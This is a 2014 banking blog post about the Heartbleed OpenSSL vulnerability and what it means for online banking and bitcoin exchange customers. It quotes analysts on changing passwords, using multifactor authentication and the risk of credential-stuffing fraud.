Banking Blog

Finance Blogs » Banking Blog » Could Web bug invade your accounts?

Could Web bug invade your accounts?

By Allison Ross ·
Wednesday, April 9, 2014
Posted: 2 pm ET

The Web has been abuzz this week after researchers announced they'd discovered a flaw in an important security method used by many websites.

The vulnerability, nicknamed Heartbleed, has been around in the affected technology -- called OpenSSL -- since 2012. Experts say there's evidence that hackers have known about this vulnerability for at least a little while.

OpenSSL lets websites encrypt communications with visitors to the sites. Ars Technica has said roughly two-thirds of servers use this technology.

Any attacks using this vulnerability are untraceable. At least one tech blogger is calling the vulnerability "catastrophic."

Websites are being advised to immediately download the newest version of the OpenSSL protocol, which includes a fix, and swap out encryption keys, change corporate passwords and log out users and advise them to change their own passwords, according to The New York Times. (Note: It's suggested that consumers change passwords after they know the site they're using has issued a fix.)

GitHub has a list of sites that were seen as vulnerable or not vulnerable to the Heartbleed bug as of yesterday. Many sites, including Yahoo, Facebook and Google, have since said they have either fixed the problem or are working on doing so, the Times reported.

Online banking

The GitHub site, which looks at the top 1,000 sites as indexed by Web-ranking firm Alexa, lists bank sites such as Bank of America, Wells Fargo and JPMorgan Chase as not being vulnerable.

However, experts say consumers should still be cautious when it comes to online banking.

Paul Jauregui, vice president of the security firm Praetorian, says he suspects many large and small banks are affected.

"This vulnerability is incredibly widespread," Jauregui says. He says he expects the larger banks will be able to respond more quickly to this issue than regional or community banks and credit unions.

He says he is telling people to change their passwords quickly after an online service has resolved the problem -- and to consider using dual-factor or multifactor authentication on accounts. He also suggests limiting in the next week how often you log on to online or mobile banking, and how much online shopping you do, to allow banks the time to properly fix the issue.

"Heartbleed is a huge story," says Shirley Inscoe, a senior analyst at Aite Group. "Consumers have been trained to look for the padlock which means a website is secure. ... Well, maybe (it's) not."

She says that consumers need to be cautious for now about where they put in credit card information.

"It may be best to stay off the Internet until websites are tested and the necessary corrective actions are taken," she says.

Inscoe says that since most consumers use the same login credentials on multiple sites, hackers may be able to use the credentials they find on a different site to get into your online bank account.

"Once their credentials are compromised, fraudsters can use automated bots to try the credentials on various financial institution sites until they find one that works," Inscoe says. "As a result, the consumer may be a victim of account takeover fraud."


Meanwhile, a few bitcoin sites have tweeted that they are temporarily halting certain services or taking precautions until the Heartbleed bug is fixed.

For instance, exchange Bitfinex tweeted Tuesday morning that "withdrawals will be disabled for 10 hours. Please change your Bitfinex credentials as soon as possible." It later tweeted that it has confirmed that the system has been patched and is safe and resumed withdrawals.

Similarly, Bitstamp turned off its login, withdrawal and other functions as a precaution, it said in a tweet. Then, early Wednesday, it tweeted that "We are happy to announce that the OpenSSL issues have been resolved. All previously disabled functions are once again available."

Here's the bottom line, dear readers: Pay attention if a website tells you it's working on a fix. Change your passwords. And, as always, pay attention to your accounts ... whether they are with a traditional bank or in a bitcoin wallet.

Despite security concerns, mobile banking is on the rise.

Follow me on Twitter (which, by the way, appears to be safe from the Heartbleed bug): @allisonsross.

Bankrate wants to hear from you and encourages comments. We ask that you stay on topic, respect other people's opinions, and avoid profanity, offensive statements, and illegal content. Please keep in mind that we reserve the right to (but are not obligated to) edit or delete your comments. Please avoid posting private or confidential information, and also keep in mind that anything you post may be disclosed, published, transmitted or reused.

By submitting a post, you agree to be bound by Bankrate's terms of use. Please refer to Bankrate's privacy policy for more information regarding Bankrate's privacy practices.
1 Comment